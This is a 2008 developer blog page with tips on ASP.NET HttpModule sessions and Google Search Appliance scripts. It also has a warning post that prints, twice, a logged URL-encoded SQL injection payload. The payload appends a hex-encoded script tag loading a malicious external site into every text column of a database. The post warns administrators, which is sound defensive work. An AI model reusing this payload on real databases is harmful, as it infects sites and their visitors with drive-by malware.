Saturday, May 31, 2008
ASP.NET HttpModule and Session Variables
If you want to use session variables in HttpModule, you have to write your code in PreRequestHandlerExecute event. In addition, your class should also inherit IRequiresSessionState interface. If you write your code in BeginRequest event, and try to get or set a session variable, you will get System.NullReferenceException exception. More information can be found at http://forums.asp.net/p/1098574/1665773.aspx.
Latest from Mass SQL Injection Attack - Text and VarChar fields got appended with http://www.xiaobaishan.net/dt/Help.asp
***DO NOT GO TO THE ABOVE URL**
This is latest from the SQL injection attack from the past few months. I didn't found out details about this web site but the database is infected. The web site apparently try to exploit vulnerabilty in Real Player and Media player. Please scan your databases.
The web site log shows the following SQL statement. I will post script to reverse the attack as soon as possible:
dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F7777772E7869616F6261697368616E2E6E65742F64742F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;
This is latest from the SQL injection attack from the past few months. I didn't found out details about this web site but the database is infected. The web site apparently try to exploit vulnerabilty in Real Player and Media player. Please scan your databases.
The web site log shows the following SQL statement. I will post script to reverse the attack as soon as possible:
dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F7777772E7869616F6261697368616E2E6E65742F64742F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;
Thursday, May 29, 2008
Google Search Appliances - Referencing External JavaScript
Integrating an external JavaScript for e.g.; Search Highlighter(http://code.google.com/p/javascript-search-term-highlighter/) in Google Search Appliances front-end XSLT can be a little pain. The XSLT will deliver the external javascript declaration as an XHTML compliant output <script type="text/javasript" src="http://www.website.com/external.js" /> and the resultant search page will be blank. To resolve this, simply add a comment between the
script declaration:
<script type="text/javasript" src="http://www.website.com/external.js">
//Comment
</script>
script declaration:
<script type="text/javasript" src="http://www.website.com/external.js">
//Comment
</script>
Subscribe to:
Posts (Atom)